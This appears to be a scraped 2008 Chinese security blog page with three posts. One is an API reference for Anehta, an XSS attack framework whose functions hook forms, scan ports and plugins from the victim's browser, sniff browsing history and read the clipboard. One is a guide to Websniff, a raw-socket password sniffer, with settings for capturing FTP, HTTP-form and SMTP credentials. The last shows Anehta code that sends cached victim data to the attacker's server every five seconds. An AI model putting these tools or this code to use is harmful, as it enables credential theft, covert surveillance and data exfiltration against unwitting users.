anehtaHook.unhook('fnhooked', 'savedfn'); //recover the fnhooked() function from the savedfn() function.

anehtaHook.injectFn('fninjected', 'savedfn', 'fn'); //inject the fnhooked() function with fn() function; the original function will be save as savedfn()

anehtaHook.hookSubmit(f, injectFn); //hook the submit of form 'f', and call injectFn() function before f's submit.

Anehta detect API Help:
tyle="color: #0000ff">anehtaBrowser.type(); //sniffer the browser type in a reliable way; return msie/mozilla/opera/safari/chrome; also save a 'BrowserSniffer' in cache

anehtaBrowser.version(); // return the browser version from userAgent.

anehta.detect.screenSize(); // return the client's Screen Size.

anehta.detect.flash(targetVersion); // check if the client support flash and flash version is higher than targetVersion; return true/false

anehta.detect.activex(objName); // check if client has the specific objName activex control; return true/false

anehta.detect.ffplugin(pluginName); // check if client has the specific firefox plugin; return true/false.

Anehta scanner API Help:
anehta.scanner.activex(); //scan all activex controls from anehta.signatures.activex list, save the result as 'Activex' in cache; return the result

anehta.scanner.ffPlugins (); //scan all the firefox plugins, save the result as 'FirefoxPlugins' in the cache; return the result.

anehta.scanner.checkPort(scanHost, scanPort, timeout); //check the specific port on the specific host is open or closed.

anehta.scanner.ports(target, timeout); //scan all the ports listed in anehta.signatures.ports against the specific host.

anehta.scanner.history(); //scan if the client has ever visited the links listed in anehta.signatures.sites; save the result as 'sitesHistory' in cache; return the result


Anehta misc API Help:
anehta.misc.getClipboard(); //get the clipboard's content(text); IE only.

anehta.misc.setClipboard(); //set the clipboard's content(text); IE only.

anehta.misc.getCurrentPage(); //return the current page's html code.

Anehta crypto API Help:
anehta.crypto.base64Encode(str); //return the base64 encode of the str.

anehta.crypto.base64Decode(str); //decode the base64 str, and return the decoded one.

分类: 技术文章 标签:

Websniff 说明文档

2008年10月31日 没有评论 98 views

作者:cnqing

PS:应邀写了篇帮助

Websniff 1.0 是user权限的 rawsocket sniff,可以截取ftp,http,smtp ...等密码,在渗透过程中绝对实用的工具。cncert网站发布的websniff需要 .net 2.0,客户端用firefox,如果用IE会让你错过一个参数设置。

先看下截图


bindip: 有多个IP的情况下,选择要监听的IP地址。只有一个IP,就不用选了。
filterport: 要监听的端口,只能同时监听一个,该参数匹配源地址或目的地址。
MiniSizeToCapture: 要捕获的数据包大小最小长度,例:设为40 那么只抓长度大于40的数据包。
KeyWordsFilter:要包含的关键字,例:设为"passwd " 在符合上面条件的数据包进一步过滤包含"passwd"的数据包,1.0版本不支持多关键字。
Logfile:捕获的数据包文件存放位置,必须为一个可写目录。
StopAttime:定时停止,格式为给出的格式,必须设置这个参数。

按钮功能 :
启动 启动当前任务,不要重复启动。
停止 停止当前任务。
刷新状态 可以查看当前抓到的数据包数和任务终止时间。

注意:欲下载数据包文件前必须停止,或等待任务终止。最好不要关闭当前页,以便控制本次任务状态。

常用设置方案:
1.FTP 如上图
2.HTTP 表单记录
bindip=IP地址
filterport: 80
MiniSizeToCapture: 0
KeyWordsFilter:user=
Logfile:捕获的数据包文件存放位置,必须为一个可写目录。
StopAttime:定时停止,格式为给出的格式,必须设置这个参数。

停止任务后将数据包文件下载到本地,使用wireshark或记事本查看内容。

关于抓取到的内容:
在有些情况下只能抓取到下行数据,即向服务器提交的数据,对记录FTP,HTTP表单,SMTP 这已足够。

后续版本将以ASPXshell客户端插件形式发布。

分类: 资源共享 标签: ,

Anehta -- 灵活的Cache机制

2008年10月31日 没有评论 75 views

作者:

有心的朋友可能已经注意到了,Anehta 中实现了一个客户端Cache

位置在core里面:
anehta.core.cache = function(){}

在core中我预定义了一个变量,可以让我们很方便的操作cache:

// 初始化一个cache出来共享数据
var anehtaCache = new anehta.core.cache();

在写模块的时候,直接使用 anehtaCache这个变量就可以了。

那么我们为什么要用cache? 它是做什么的?

cache的思想最初来源于一个jQuery 的插件: jCache

我最初的想法是anehta的底层实现一套共享数据的机制,让模块之间可以互相通信,可以把要保存的东西放到这个里面来。

后来寻找一些资料后,找到了jCache这个插件,但是它还是无法完全满足我的需求,于是,我扩展了jCache大概50%的代码,有了现在的 anehtaCache 1.0

使用anehtaCache后,在客户端的数据操作将会变得非常简单,比如ajax得到的结果,可以直接保存在cache里,让其他模块进行访问。

cache就像一个公共的共享pool,任何模块都可以来这里找自己想要的,或者可以把想保存和共享的放到这里。

cache的实现其实也很简单,就是两个数组,一个保存key,一个保存value,是一一对应的关系,找到了key,就能取出相应的值。

cache使用的是FIFO的方式,即先进先出,默认长度是30,就是说可以保存30个不同的key,如果超过了30,就会把最先保存进行的删掉。

anehtaCache的操作,可以看这张图,这是我在anehta的下一个版本里会加入的help()函数的功能。

可以看到对cache的操作是非常灵活的,用的最多的还是
anehtaCache.setItem(key, value);

anehtaCache.getItem(key);

anehtaCache.appendItem(key,value);

这几个,比如在ajax的实现中,就默认保存了response结果到cache中:
anehta.ajax.get = function(url){
anehtaXmlHttp.get(url, null, function(response, responseHeaders) {
if (responseHeaders != null) {
//alert(responseHeaders);
anehtaCache.setItem("ajaxGetResponseHeaders", responseHeaders);
}

if (response != null) {
//alert(response);
anehtaCache.setItem("ajaxGetResponse", response);
}
});
}

而在anehta.logger.logCache() 这个函数中,则会每隔五秒钟检查一次cache,如果发现里面的数据有变化,就会直接发送cache到服务器:
var keys = anehtaCache.showKeys();
if (keys != null){ // cache里有东西
var cache = "";
for (i=0; i<keys.length; i++) {
if (anehtaCache.hasItem(keys[i]) == true){
cache = cache + "\r\n" + XssInfo_S + keys[i] + ": " + anehtaCache.getItem(keys[i]) + XssInfo_E;
}
}

anehtaCache就是anehta的虚拟内存,是anehta的核心设计理念之一,使用它,将让你的xss payload变得更加灵活和强大。

分类: 技术文章 标签: